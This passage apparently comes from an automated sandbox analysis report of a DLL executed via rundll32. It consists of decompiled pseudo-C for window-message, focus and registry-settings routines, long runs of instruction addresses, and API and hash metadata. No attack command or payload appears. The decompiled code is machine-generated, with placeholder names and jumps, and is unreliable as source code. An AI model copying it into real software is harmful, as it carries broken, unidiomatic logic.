						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E10004E6E(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E10014F82(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1000E519();
				}
				_t59 = _t98;
				goto L22;
			}
















                                                                                                            0x10017235
                                                                                                            0x10017235
                                                                                                            0x1001723c
                                                                                                            0x1001724a
                                                                                                            0x10017253
                                                                                                            0x10017260
                                                                                                            0x10017263
                                                                                                            0x1001738a
                                                                                                            0x1001738a
                                                                                                            0x1001738e
                                                                                                            0x10017391
                                                                                                            0x10017393
                                                                                                            0x10017396
                                                                                                            0x10017397
                                                                                                            0x10017397
                                                                                                            0x1001739c
                                                                                                            0x1001739c
                                                                                                            0x1001739e
                                                                                                            0x100173a3
                                                                                                            0x100173a3
                                                                                                            0x1001726f
                                                                                                            0x100172bc
                                                                                                            0x100172bf
                                                                                                            0x100172c5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100172cb
                                                                                                            0x100172d2
                                                                                                            0x100172d8
                                                                                                            0x100172dd
                                                                                                            0x100172df
                                                                                                            0x100172e2
                                                                                                            0x100172e5
                                                                                                            0x100172e7
                                                                                                            0x100172ee
                                                                                                            0x100172fa
                                                                                                            0x100172fc
                                                                                                            0x100172fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001730b
                                                                                                            0x10017317
                                                                                                            0x1001731c
                                                                                                            0x10017321
                                                                                                            0x10017324
                                                                                                            0x10017326
                                                                                                            0x10017329
                                                                                                            0x1001732b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10017348
                                                                                                            0x1001734b
                                                                                                            0x1001734e
                                                                                                            0x10017354
                                                                                                            0x10017357
                                                                                                            0x1001735c
                                                                                                            0x1001735c
                                                                                                            0x1001735e
                                                                                                            0x10017361
                                                                                                            0x10017366
                                                                                                            0x10017366
                                                                                                            0x10017368
                                                                                                            0x1001736b
                                                                                                            0x10017370
                                                                                                            0x10017370
                                                                                                            0x10017372
                                                                                                            0x10017378
                                                                                                            0x1001737b
                                                                                                            0x1001737e
                                                                                                            0x10017380
                                                                                                            0x10017380
                                                                                                            0x00000000
                                                                                                            0x1001737e
                                                                                                            0x100172e9
                                                                                                            0x100172e9
                                                                                                            0x00000000
                                                                                                            0x100172e9
                                                                                                            0x10017274
                                                                                                            0x1001727d
                                                                                                            0x10017284
                                                                                                            0x10017287
                                                                                                            0x1001728a
                                                                                                            0x1001728d
                                                                                                            0x10017290
                                                                                                            0x10017293
                                                                                                            0x10017296
                                                                                                            0x1001729e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100172a0
                                                                                                            0x100172a7
                                                                                                            0x100172aa
                                                                                                            0x100172ac
                                                                                                            0x100172af
                                                                                                            0x100172b0
                                                                                                            0x100172b0
                                                                                                            0x100172b5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                            • String ID:
                                                                                                            • API String ID: 3574576181-0
                                                                                                            • Opcode ID: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
                                                                                                            • Instruction ID: 2d0dd3affd8f04fec97c60edc25b67d043c515f8611652d59fdaf26af88a8b29
                                                                                                            • Opcode Fuzzy Hash: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
                                                                                                            • Instruction Fuzzy Hash: 66414871900629EFCB01CFA4C8459DEBBB9FF08B50F10851AF529AF155C770AA82CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100072BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E100072BC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10045580; // 0x6a53a566
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E1001FBC4(E1003309F, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000701D(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000702E();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E1001FBB5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E1000563B(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10005500( &_v16,  *(_t100 + 0x54));
						_push(0x10037310);
						_push( &_v16);
						_push( &_v36);
						_t54 = E10007149(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E10007149(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10001260(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E100071AD(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E100071AD(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10001260( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10001260( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10044410;
						E100209E8( &_v280, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t79, 0, _t100);
						_t94 = E100105C8(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000E58E(_t94);
						}
						return E1001FC9C(_t77);
					}
				}
			}




























                                                                                                            0x100072bc
                                                                                                            0x100072bc
                                                                                                            0x100072bc
                                                                                                            0x100072c3
                                                                                                            0x100072c7
                                                                                                            0x100072ce
                                                                                                            0x100072d4
                                                                                                            0x100072db
                                                                                                            0x100072e2
                                                                                                            0x100072e4
                                                                                                            0x100072e7
                                                                                                            0x100072ea
                                                                                                            0x100072f1
                                                                                                            0x100072f4
                                                                                                            0x100072f6
                                                                                                            0x100072f6
                                                                                                            0x100072f9
                                                                                                            0x100072fa
                                                                                                            0x100072fc
                                                                                                            0x10007301
                                                                                                            0x10007303
                                                                                                            0x10007305
                                                                                                            0x1000730c
                                                                                                            0x1000730e
                                                                                                            0x1000730e
                                                                                                            0x10007311
                                                                                                            0x10007311
                                                                                                            0x100072f6
                                                                                                            0x10007316
                                                                                                            0x10007319
                                                                                                            0x100073f6
                                                                                                            0x100073fc
                                                                                                            0x10007404
                                                                                                            0x10007405
                                                                                                            0x10007406
                                                                                                            0x1000740f
                                                                                                            0x10007414
                                                                                                            0x1000741b
                                                                                                            0x1000731f
                                                                                                            0x10007321
                                                                                                            0x10007327
                                                                                                            0x10007329
                                                                                                            0x10007330
                                                                                                            0x10007338
                                                                                                            0x10007343
                                                                                                            0x10007346
                                                                                                            0x1000734b
                                                                                                            0x10007353
                                                                                                            0x10007357
                                                                                                            0x10007358
                                                                                                            0x1000735d
                                                                                                            0x10007360
                                                                                                            0x10007364
                                                                                                            0x10007368
                                                                                                            0x10007369
                                                                                                            0x10007377
                                                                                                            0x1000737b
                                                                                                            0x10007383
                                                                                                            0x10007389
                                                                                                            0x1000738a
                                                                                                            0x10007397
                                                                                                            0x1000739d
                                                                                                            0x1000739f
                                                                                                            0x100073b4
                                                                                                            0x100073b9
                                                                                                            0x100073be
                                                                                                            0x100073bf
                                                                                                            0x100073c0
                                                                                                            0x100073c0
                                                                                                            0x100073c8
                                                                                                            0x100073c8
                                                                                                            0x100073da
                                                                                                            0x100073e6
                                                                                                            0x100073ee
                                                                                                            0x100073f1
                                                                                                            0x00000000
                                                                                                            0x1000732b
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10007329

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 100072DB
                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10007397
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100073AE
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 100073C8
                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100073DA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                            • String ID: Software\
                                                                                                            • API String ID: 3878845136-964853688
                                                                                                            • Opcode ID: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
                                                                                                            • Instruction ID: 431f38651a312ef553f30843a41239907c7d8c638de5ca089e0c10656c75fbe4
                                                                                                            • Opcode Fuzzy Hash: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
                                                                                                            • Instruction Fuzzy Hash: 5C41AC35D00109AFEB11DBA4CC81AEFB7B9FF44380F50052AF555E6295DB38AA44DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000A486 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1000A486(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E1000EEC4(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E100069E2(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10006DDA(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1000EF92(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E10006CF4(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10005AC4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1000EF92(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}






















                                                                                                            0x1000a486
                                                                                                            0x1000a48f
                                                                                                            0x1000a497
                                                                                                            0x1000a499
                                                                                                            0x1000a49d
                                                                                                            0x1000a4a1
                                                                                                            0x1000a4af
                                                                                                            0x1000a4af
                                                                                                            0x1000a4b4
                                                                                                            0x1000a4ba
                                                                                                            0x1000a4be
                                                                                                            0x1000a4c2
                                                                                                            0x1000a4c7
                                                                                                            0x1000a4cd
                                                                                                            0x1000a545
                                                                                                            0x1000a545
                                                                                                            0x1000a545
                                                                                                            0x1000a549
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000a4e1
                                                                                                            0x1000a4e3
                                                                                                            0x1000a54b
                                                                                                            0x1000a54b
                                                                                                            0x1000a54b
                                                                                                            0x1000a552
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000a556
                                                                                                            0x1000a55c
                                                                                                            0x1000a564
                                                                                                            0x1000a571
                                                                                                            0x1000a579
                                                                                                            0x1000a57b
                                                                                                            0x1000a57b
                                                                                                            0x1000a564
                                                                                                            0x1000a57f
                                                                                                            0x1000a581
                                                                                                            0x1000a587
                                                                                                            0x1000a589
                                                                                                            0x1000a5c4
                                                                                                            0x1000a5c4
                                                                                                            0x1000a5c4
                                                                                                            0x00000000
                                                                                                            0x1000a58b
                                                                                                            0x1000a58f
                                                                                                            0x1000a596
                                                                                                            0x1000a597
                                                                                                            0x1000a599
                                                                                                            0x1000a5a1
                                                                                                            0x1000a5a1
                                                                                                            0x1000a5b5
                                                                                                            0x00000000
                                                                                                            0x1000a5b7
                                                                                                            0x00000000
                                                                                                            0x1000a5b7
                                                                                                            0x1000a5b5
                                                                                                            0x1000a589
                                                                                                            0x1000a5b9
                                                                                                            0x1000a5ba
                                                                                                            0x00000000
                                                                                                            0x1000a5bf
                                                                                                            0x1000a4e5
                                                                                                            0x1000a4e7
                                                                                                            0x1000a4eb
                                                                                                            0x1000a4ed
                                                                                                            0x1000a4f5
                                                                                                            0x1000a4f7
                                                                                                            0x1000a4f7
                                                                                                            0x1000a4f7
                                                                                                            0x1000a4f9
                                                                                                            0x1000a4fe
                                                                                                            0x1000a500
                                                                                                            0x1000a504
                                                                                                            0x1000a506
                                                                                                            0x1000a50a
                                                                                                            0x1000a519
                                                                                                            0x1000a519
                                                                                                            0x1000a50a
                                                                                                            0x1000a504
                                                                                                            0x1000a51f
                                                                                                            0x1000a524
                                                                                                            0x1000a541
                                                                                                            0x1000a541
                                                                                                            0x00000000
                                                                                                            0x1000a526
                                                                                                            0x1000a533
                                                                                                            0x1000a539
                                                                                                            0x1000a53d
                                                                                                            0x1000a53f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000a53f
                                                                                                            0x1000a524
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetParent.USER32(00000004), ref: 1000A4B4
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000A4DB
                                                                                                            • UpdateWindow.USER32(00000004), ref: 1000A4F5
                                                                                                            • SendMessageA.USER32(?,00000121,00000000,00000004), ref: 1000A519
                                                                                                            • SendMessageA.USER32(00000004,0000036A,00000000,00000004), ref: 1000A533
                                                                                                            • UpdateWindow.USER32(00000004), ref: 1000A579
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000A5AD
                                                                                                              • Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 2853195852-0
                                                                                                            • Opcode ID: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
                                                                                                            • Instruction ID: db41b359fa61aebdb5d40a64e0a657e9155f7da8113a89a494e7da7d34e0904b
                                                                                                            • Opcode Fuzzy Hash: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
                                                                                                            • Instruction Fuzzy Hash: A3417E30604B829FF711CF258C88A1BBAF5FFCABD5F104A2DF5819606AD761D984CA52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000634E Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1000634E(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10005CAE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000EC09(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E1000BB9A(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E1000BB9A(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E1000BBDF(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E1000BB9A(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10044410;
						E100209E8( &_v28, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t37, _t46, _t51);
						_t43 = E100105C8(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000E58E(_t43);
						}
						return E1001FC9C(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}
























                                                                                                            0x1000634e
                                                                                                            0x1000634e
                                                                                                            0x1000634e
                                                                                                            0x10006353
                                                                                                            0x1000636e
                                                                                                            0x10006370
                                                                                                            0x10006372
                                                                                                            0x1000637d
                                                                                                            0x10006383
                                                                                                            0x10006385
                                                                                                            0x10006387
                                                                                                            0x10006388
                                                                                                            0x1001132f
                                                                                                            0x10011331
                                                                                                            0x10011334
                                                                                                            0x10011336
                                                                                                            0x10011358
                                                                                                            0x00000000
                                                                                                            0x10011338
                                                                                                            0x10011338
                                                                                                            0x1001133d
                                                                                                            0x1001133f
                                                                                                            0x10011350
                                                                                                            0x10011350
                                                                                                            0x10011357
                                                                                                            0x10011357
                                                                                                            0x1000638a
                                                                                                            0x10011290
                                                                                                            0x10011290
                                                                                                            0x10011291
                                                                                                            0x10011292
                                                                                                            0x10011293
                                                                                                            0x10011294
                                                                                                            0x10011295
                                                                                                            0x10011299
                                                                                                            0x1001129f
                                                                                                            0x100112a5
                                                                                                            0x100112be
                                                                                                            0x100112be
                                                                                                            0x100112c0
                                                                                                            0x100112c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100112b2
                                                                                                            0x100112b4
                                                                                                            0x100112b6
                                                                                                            0x10011328
                                                                                                            0x1001132d
                                                                                                            0x100112b8
                                                                                                            0x100112b9
                                                                                                            0x00000000
                                                                                                            0x100112b9
                                                                                                            0x00000000
                                                                                                            0x100112b6
                                                                                                            0x100112c4
                                                                                                            0x100112dc
                                                                                                            0x100112dc
                                                                                                            0x100112de
                                                                                                            0x100112e0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100112d0
                                                                                                            0x100112d2
                                                                                                            0x100112d4
                                                                                                            0x00000000
                                                                                                            0x100112d6
                                                                                                            0x100112d7
                                                                                                            0x00000000
                                                                                                            0x100112d7
                                                                                                            0x00000000
                                                                                                            0x100112d4
                                                                                                            0x100112e2
                                                                                                            0x100112e6
                                                                                                            0x100112eb
                                                                                                            0x100112ed
                                                                                                            0x100112f7
                                                                                                            0x1001130e
                                                                                                            0x1001130e
                                                                                                            0x10011310
                                                                                                            0x10011312
                                                                                                            0x10011313
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011302
                                                                                                            0x10011304
                                                                                                            0x10011306
                                                                                                            0x10011309
                                                                                                            0x00000000
                                                                                                            0x10011309
                                                                                                            0x00000000
                                                                                                            0x10011306
                                                                                                            0x10011326
                                                                                                            0x00000000
                                                                                                            0x100112ef
                                                                                                            0x00000000
                                                                                                            0x100112ef
                                                                                                            0x100112ed
                                                                                                            0x10006374
                                                                                                            0x10004e6e
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10006355
